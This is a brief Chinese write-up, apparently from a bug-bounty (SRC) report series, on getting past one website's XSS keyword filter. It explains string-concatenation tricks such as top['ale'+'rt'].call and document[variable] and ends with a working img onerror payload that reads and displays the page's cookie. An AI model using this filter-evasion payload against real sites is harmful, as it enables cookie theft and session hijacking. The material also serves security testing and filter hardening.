前言
该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。
XSS 特征
拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过
xss绕过
- alert用top[‘ale’+‘rt’]绕过
- alert()用top[‘ale’+‘rt’].call绕过
- cookie用document[变量]绕过
最终payload
<img src=\"x\" one rror=\"c='coo'+'kie';top['ale'+'rt'].call(null,document[c])\">